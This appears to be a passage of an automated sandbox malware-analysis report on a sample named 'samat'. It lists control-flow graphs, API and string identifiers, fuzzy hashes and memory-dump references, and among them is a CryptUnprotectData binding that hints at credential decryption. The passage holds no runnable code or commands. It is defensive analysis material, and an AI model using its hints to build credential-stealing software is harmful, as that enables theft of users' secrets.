                                                                                                                                                                                                                                                                                      • API String ID: 234229340-1080266419
                                                                                                                                                                                                                                                                                      • Opcode ID: f7e90b002c0f20001dbf9e5a2de404a379799662cee41334dc9c8a45caab9bf3
                                                                                                                                                                                                                                                                                      • Instruction ID: 239cb4180f08cf854ea9059c765fcd7dcca6b7dc5a372dfc0957df3d32ad00c6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7e90b002c0f20001dbf9e5a2de404a379799662cee41334dc9c8a45caab9bf3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5912F25A1964280FB54AF2AD9512FD2721EF89BC8F4C5032EF1D0B69ACF3DE1478718

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$CriticalSection$AllocDeleteFreeHandleInitializeLibraryLoadModule
                                                                                                                                                                                                                                                                                      • String ID: AddAccessAllowedAce$AddAccessAllowedAceEx$AddAccessAllowedObjectAce$AddAccessDeniedAce$AddAccessDeniedAceEx$AddAccessDeniedObjectAce$AddAuditAccessAceEx$AddAuditAccessObjectAce$AddMandatoryAce$AdvAPI32.dll$SetSecurityDescriptorControl
                                                                                                                                                                                                                                                                                      • API String ID: 3842108915-2689366622
                                                                                                                                                                                                                                                                                      • Opcode ID: 57473d222362ce1a73b4be061c9170d604a9f0b2407b316df202a6e5a26e742f
                                                                                                                                                                                                                                                                                      • Instruction ID: affb4b7eb79b53683e5c4793fdb59da8d4ead73fa312edda18f0f67200fc5d1c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57473d222362ce1a73b4be061c9170d604a9f0b2407b316df202a6e5a26e742f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3513326A49B0AA5EF49DB5EFC9417833A4AF88FD5F44503AEA0E43374EF3CA5548300
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: UNIQUE$BINARY$CREATE%s INDEX %.*s$INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);$cannot create a TEMP index on non-TEMP table "%s"$conflicting ON CONFLICT clauses specified$expressions prohibited in PRIMARY KEY and UNIQUE constraints$index$index %s already exists$invalid rootpage$name='%q' AND type='index'$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$sqlite_temp_master$table %s may not be indexed$there is already a table named %s$too many columns in %s$views may not be indexed$virtual tables may not be indexed
                                                                                                                                                                                                                                                                                      • API String ID: 0-4172737255
                                                                                                                                                                                                                                                                                      • Opcode ID: e6aaa302de3afdb3e955935eef4223feae12bb8825ca52dee905d1f93797de2c
                                                                                                                                                                                                                                                                                      • Instruction ID: 0557aa0ef7ad5045435b36ea909e3d71605b0951778e058fdf16404d926853b2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6aaa302de3afdb3e955935eef4223feae12bb8825ca52dee905d1f93797de2c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67B2BA62A49B9686EF608B2A94406BA27B1FB89BC4F484536DF4D077D5DF3CE853C304

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572680567.00007FF8B7EB1000.00000020.00000001.01000000.00000031.sdmp, Offset: 00007FF8B7EB0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572618132.00007FF8B7EB0000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572831046.00007FF8B7ECC000.00000004.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572895965.00007FF8B7ECF000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7eb0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BufferView@@$Free$Object_$Eval_FromLocalStringThreadU_object@@U_object@@_$Arg_BuildBytes_CryptDataErr_Error@@KeywordsParseRestoreSaveSizeTupleUnprotectValueWin_
                                                                                                                                                                                                                                                                                      • String ID: CryptUnprotectData$O|OOOk:CryptUnprotectData$Reserved must be None
                                                                                                                                                                                                                                                                                      • API String ID: 674621842-630361847
                                                                                                                                                                                                                                                                                      • Opcode ID: 8571ba1da2a79e8f39c947d7549dfd2b965916f8899a278ea0dab190675a46f9
                                                                                                                                                                                                                                                                                      • Instruction ID: 922b6e281b994e42bb31dd89bca0a4dcd704c2455d8aa214602eab756872821c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8571ba1da2a79e8f39c947d7549dfd2b965916f8899a278ea0dab190675a46f9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E271E53AA08B5286EB108B79E8901AD77A5FF88B94F140136DB4D53B68DF3CE589C700

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 996 7ff8b7ff92b0-7ff8b7ff932f 997 7ff8b7ff9335-7ff8b7ff933f 996->997 998 7ff8b7ff948d-7ff8b7ff94a3 996->998 997->998 999 7ff8b7ff9345-7ff8b7ff9348 997->999 1000 7ff8b7ff939f-7ff8b7ff93e5 call 7ff8b7fe6180 998->1000 1001 7ff8b7ff94a9-7ff8b7ff94af 998->1001 999->1001 1002 7ff8b7ff934e 999->1002 1010 7ff8b7ff9a7e-7ff8b7ff9a81 1000->1010 1011 7ff8b7ff93eb-7ff8b7ff944f memset 1000->1011 1001->1000 1003 7ff8b7ff94b5-7ff8b7ff94cb call 7ff8b7fe6180 1001->1003 1005 7ff8b7ff9355-7ff8b7ff935e 1002->1005 1013 7ff8b7ff94d1-7ff8b7ff94ec 1003->1013 1014 7ff8b7ff9ade 1003->1014 1005->1005 1008 7ff8b7ff9360-7ff8b7ff936f call 7ff8b7fe6180 1005->1008 1008->1014 1027 7ff8b7ff9375-7ff8b7ff938b memcpy 1008->1027 1010->1014 1015 7ff8b7ff9a83-7ff8b7ff9a8a 1010->1015 1016 7ff8b7ff9455-7ff8b7ff9471 memcpy 1011->1016 1017 7ff8b7ff9778-7ff8b7ff9788 1011->1017 1034 7ff8b7ff9506-7ff8b7ff950d 1013->1034 1035 7ff8b7ff94ee-7ff8b7ff94ff 1013->1035 1020 7ff8b7ff9ae3-7ff8b7ff9afa 1014->1020 1021 7ff8b7ff9ad5 1015->1021 1022 7ff8b7ff9a8c-7ff8b7ff9a96 1015->1022 1023 7ff8b7ff9477-7ff8b7ff9488 memcpy 1016->1023 1024 7ff8b7ff962b 1016->1024 1018 7ff8b7ff96cf-7ff8b7ff96f4 1017->1018 1025 7ff8b7ff982f 1018->1025 1026 7ff8b7ff96fa-7ff8b7ff96ff 1018->1026 1021->1014 1030 7ff8b7ff9a9e-7ff8b7ff9acb 1022->1030 1031 7ff8b7ff9a98 1022->1031 1029 7ff8b7ff962e-7ff8b7ff9677 memcpy * 2 1023->1029 1024->1029 1036 7ff8b7ff9834-7ff8b7ff9842 1025->1036 1026->1025 1032 7ff8b7ff9705-7ff8b7ff9731 call 7ff8b7feffd0 1026->1032 1033 7ff8b7ff9390-7ff8b7ff9397 1027->1033 1037 7ff8b7ff96cd 1029->1037 1038 7ff8b7ff9679-7ff8b7ff9680 1029->1038 1030->1014 1059 7ff8b7ff9acd-7ff8b7ff9ad3 1030->1059 1031->1030 1045 7ff8b7ff9734-7ff8b7ff9754 1032->1045 1033->1033 1039 7ff8b7ff9399 1033->1039 1040 7ff8b7ff9510-7ff8b7ff9517 1034->1040 1035->1034 1041 7ff8b7ff9845-7ff8b7ff9848 1036->1041 1037->1018 1042 7ff8b7ff9686-7ff8b7ff9690 1038->1042 1043 7ff8b7ff976a-7ff8b7ff9773 1038->1043 1039->1000 1040->1040 1046 7ff8b7ff9519-7ff8b7ff9520 1040->1046 1047 7ff8b7ff984e-7ff8b7ff9869 call 7ff8b7ff8830 1041->1047 1048 7ff8b7ff98fb-7ff8b7ff9905 1041->1048 1049 7ff8b7ff9692 1042->1049 1050 7ff8b7ff9698-7ff8b7ff96c5 1042->1050 1043->1037 1054 7ff8b7ff982a-7ff8b7ff982d 1045->1054 1055 7ff8b7ff975a-7ff8b7ff9764 1045->1055 1056 7ff8b7ff9527-7ff8b7ff952e 1046->1056 1047->1048 1071 7ff8b7ff986f-7ff8b7ff98f3 1047->1071 1052 7ff8b7ff9907-7ff8b7ff9910 1048->1052 1053 7ff8b7ff9913-7ff8b7ff9926 call 7ff8b7ff46f0 1048->1053 1049->1050 1050->1037 1083 7ff8b7ff96c7 1050->1083 1052->1053 1079 7ff8b7ff9a70-7ff8b7ff9a7c 1053->1079 1080 7ff8b7ff992c-7ff8b7ff9936 1053->1080 1054->1041 1061 7ff8b7ff9766-7ff8b7ff9768 1055->1061 1062 7ff8b7ff978d-7ff8b7ff9790 1055->1062 1056->1056 1063 7ff8b7ff9530-7ff8b7ff9547 1056->1063 1059->1014 1068 7ff8b7ff9792-7ff8b7ff979a 1061->1068 1062->1068 1069 7ff8b7ff9597-7ff8b7ff959e 1063->1069 1070 7ff8b7ff9549 1063->1070 1075 7ff8b7ff97be-7ff8b7ff97d4 call 7ff8b80a6ad0 1068->1075 1076 7ff8b7ff979c-7ff8b7ff97b0 call 7ff8b7ff7c00 1068->1076 1077 7ff8b7ff95c2-7ff8b7ff95c9 1069->1077 1078 7ff8b7ff95a0-7ff8b7ff95a7 1069->1078 1081 7ff8b7ff9550-7ff8b7ff9557 1070->1081 1093 7ff8b7ff98f5 1071->1093 1094 7ff8b7ff9959-7ff8b7ff995f 1071->1094 1103 7ff8b7ff97d6-7ff8b7ff97eb call 7ff8b805df90 1075->1103 1104 7ff8b7ff97ed 1075->1104 1076->1075 1102 7ff8b7ff97b2-7ff8b7ff97b7 1076->1102 1087 7ff8b7ff95cb-7ff8b7ff95d5 1077->1087 1088 7ff8b7ff961a 1077->1088 1078->1000 1085 7ff8b7ff95ad-7ff8b7ff95bc call 7ff8b80a5ae0 1078->1085 1079->1020 1089 7ff8b7ff993e-7ff8b7ff9951 1080->1089 1090 7ff8b7ff9938 1080->1090 1091 7ff8b7ff9560-7ff8b7ff9569 1081->1091 1083->1037 1085->1000 1085->1077 1099 7ff8b7ff95d7 1087->1099 1100 7ff8b7ff95dd-7ff8b7ff960a 1087->1100 1101 7ff8b7ff9623-7ff8b7ff9626 1088->1101 1089->1094 1090->1089 1091->1091 1092 7ff8b7ff956b-7ff8b7ff9579 1091->1092 1106 7ff8b7ff9580-7ff8b7ff9589 1092->1106 1093->1048 1107 7ff8b7ff9961-7ff8b7ff9984 1094->1107 1108 7ff8b7ff9988-7ff8b7ff9998 1094->1108 1099->1100 1100->1101 1122 7ff8b7ff960c-7ff8b7ff9615 1100->1122 1101->1020 1102->1075 1113 7ff8b7ff97ef-7ff8b7ff97f4 1103->1113 1104->1113 1106->1106 1110 7ff8b7ff958b-7ff8b7ff9595 1106->1110 1107->1108 1120 7ff8b7ff99a0-7ff8b7ff99d1 1108->1120 1121 7ff8b7ff999a 1108->1121 1110->1069 1110->1081 1115 7ff8b7ff97f6-7ff8b7ff980c call 7ff8b80a6ad0 1113->1115 1116 7ff8b7ff9822-7ff8b7ff9828 1113->1116 1115->1054 1126 7ff8b7ff980e-7ff8b7ff9820 call 7ff8b805df90 1115->1126 1116->1036 1124 7ff8b7ff99e4-7ff8b7ff99eb 1120->1124 1125 7ff8b7ff99d3-7ff8b7ff99e2 1120->1125 1121->1120 1122->1020 1127 7ff8b7ff99ef-7ff8b7ff9a11 call 7ff8b7ff7c00 1124->1127 1125->1127 1126->1054 1126->1116 1133 7ff8b7ff9a13-7ff8b7ff9a17 1127->1133 1134 7ff8b7ff9a19-7ff8b7ff9a1c 1127->1134 1135 7ff8b7ff9a27-7ff8b7ff9a39 1133->1135 1136 7ff8b7ff9a23 1134->1136 1137 7ff8b7ff9a1e-7ff8b7ff9a21 1134->1137 1138 7ff8b7ff9a44-7ff8b7ff9a56 1135->1138 1139 7ff8b7ff9a3b-7ff8b7ff9a42 1135->1139 1136->1135 1137->1135 1137->1136 1140 7ff8b7ff9a5a-7ff8b7ff9a6e 1138->1140 1139->1140 1140->1020
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                      • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                                                                      • API String ID: 438689982-4201244970
                                                                                                                                                                                                                                                                                      • Opcode ID: 74c394c9142b35d2fd43c5d798de1803b6b601682fd161d5b0baee638d432f90
                                                                                                                                                                                                                                                                                      • Instruction ID: e8da34741091c5b1fa3f16056bc04c58d2a965ea4232870dd7344904ec9731d9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74c394c9142b35d2fd43c5d798de1803b6b601682fd161d5b0baee638d432f90
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63329A22A0A78286EB25DF29945037937A1FB45BE5F084234CB6E4B7E4DF3CE456C708

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1216 7ff7e12e6964-7ff7e12e69d7 call 7ff7e12e6698 1219 7ff7e12e69f1-7ff7e12e69fb call 7ff7e12d8520 1216->1219 1220 7ff7e12e69d9-7ff7e12e69e2 call 7ff7e12d4ee8 1216->1220 1226 7ff7e12e6a16-7ff7e12e6a7f CreateFileW 1219->1226 1227 7ff7e12e69fd-7ff7e12e6a14 call 7ff7e12d4ee8 call 7ff7e12d4f08 1219->1227 1225 7ff7e12e69e5-7ff7e12e69ec call 7ff7e12d4f08 1220->1225 1239 7ff7e12e6d32-7ff7e12e6d52 1225->1239 1230 7ff7e12e6a81-7ff7e12e6a87 1226->1230 1231 7ff7e12e6afc-7ff7e12e6b07 GetFileType 1226->1231 1227->1225 1236 7ff7e12e6ac9-7ff7e12e6af7 GetLastError call 7ff7e12d4e7c 1230->1236 1237 7ff7e12e6a89-7ff7e12e6a8d 1230->1237 1233 7ff7e12e6b5a-7ff7e12e6b61 1231->1233 1234 7ff7e12e6b09-7ff7e12e6b44 GetLastError call 7ff7e12d4e7c CloseHandle 1231->1234 1242 7ff7e12e6b63-7ff7e12e6b67 1233->1242 1243 7ff7e12e6b69-7ff7e12e6b6c 1233->1243 1234->1225 1250 7ff7e12e6b4a-7ff7e12e6b55 call 7ff7e12d4f08 1234->1250 1236->1225 1237->1236 1244 7ff7e12e6a8f-7ff7e12e6ac7 CreateFileW 1237->1244 1248 7ff7e12e6b72-7ff7e12e6bc7 call 7ff7e12d8438 1242->1248 1243->1248 1249 7ff7e12e6b6e 1243->1249 1244->1231 1244->1236 1254 7ff7e12e6be6-7ff7e12e6c17 call 7ff7e12e6418 1248->1254 1255 7ff7e12e6bc9-7ff7e12e6bd5 call 7ff7e12e68a0 1248->1255 1249->1248 1250->1225 1262 7ff7e12e6c1d-7ff7e12e6c5f 1254->1262 1263 7ff7e12e6c19-7ff7e12e6c1b 1254->1263 1255->1254 1261 7ff7e12e6bd7 1255->1261 1264 7ff7e12e6bd9-7ff7e12e6be1 call 7ff7e12daac0 1261->1264 1265 7ff7e12e6c81-7ff7e12e6c8c 1262->1265 1266 7ff7e12e6c61-7ff7e12e6c65 1262->1266 1263->1264 1264->1239 1269 7ff7e12e6d30 1265->1269 1270 7ff7e12e6c92-7ff7e12e6c96 1265->1270 1266->1265 1268 7ff7e12e6c67-7ff7e12e6c7c 1266->1268 1268->1265 1269->1239 1270->1269 1271 7ff7e12e6c9c-7ff7e12e6ce1 CloseHandle CreateFileW 1270->1271 1273 7ff7e12e6ce3-7ff7e12e6d11 GetLastError call 7ff7e12d4e7c call 7ff7e12d8660 1271->1273 1274 7ff7e12e6d16-7ff7e12e6d2b 1271->1274 1273->1274 1274->1269
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                                      • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                                                      • Instruction ID: fa1b00118abf8c3beb5864411022a9176577bd252dcd7c31b3930ecdedd5bb51
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79C1F333B28A4285EB11DFA5C8823AC7765F749B98F81423ADE2E97794CF79E051C311
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                                                                                      • API String ID: 3510742995-509082904
                                                                                                                                                                                                                                                                                      • Opcode ID: de9d8daf37c74b9081c646134e786b93087933e5578fbc028138b62138ad8e81
                                                                                                                                                                                                                                                                                      • Instruction ID: 4012b45fc4db8def1d3318595fc5387ae4534306cb52ffd80f5ad704c05b1452
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de9d8daf37c74b9081c646134e786b93087933e5578fbc028138b62138ad8e81
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8126C62A0AA4685EF549F29E4903B967A1FB44BC8F584036DF5E077D4DF3CE4438728
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                      • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                                                                      • API String ID: 438689982-1046679716
                                                                                                                                                                                                                                                                                      • Opcode ID: a7773bcf006ca47f508f3509f08daab0c77021ee5096fe5b50ed20204dddea81
                                                                                                                                                                                                                                                                                      • Instruction ID: 76cbca8ff14f2e97eb0810183328a62863711e7355ed53accf3252f40d86c59b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7773bcf006ca47f508f3509f08daab0c77021ee5096fe5b50ed20204dddea81
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53F15E32A09A8286EF65DF2994043BA6BA1EB85BC8F084135DB4D0B7D5DF7CE5838744
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpystrcmp
                                                                                                                                                                                                                                                                                      • String ID: :memory:
                                                                                                                                                                                                                                                                                      • API String ID: 4075415522-2920599690
                                                                                                                                                                                                                                                                                      • Opcode ID: ef0f4c48fb7268e94bdb7380642fef1f1c5abab4a2eb0e213b61a67f484a65ae
                                                                                                                                                                                                                                                                                      • Instruction ID: a44392c6cdfbef0cb1796b11b4b899ee30d52b14b3bd17d9e0a714b34eeff8d6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef0f4c48fb7268e94bdb7380642fef1f1c5abab4a2eb0e213b61a67f484a65ae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A426D62A0A78B82EE679B69955073967A0FF85BC4F084135CB4E077A1DF3CE497C708
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                                                      • Instruction ID: 303cc4c16ec65fcddf93b7d255406e535a04841912aebca1591233be52101179
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6F0C822B1878186FB609B60B88A766B354BB84375F840337DAAE12AD4DF7CD059CA05
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
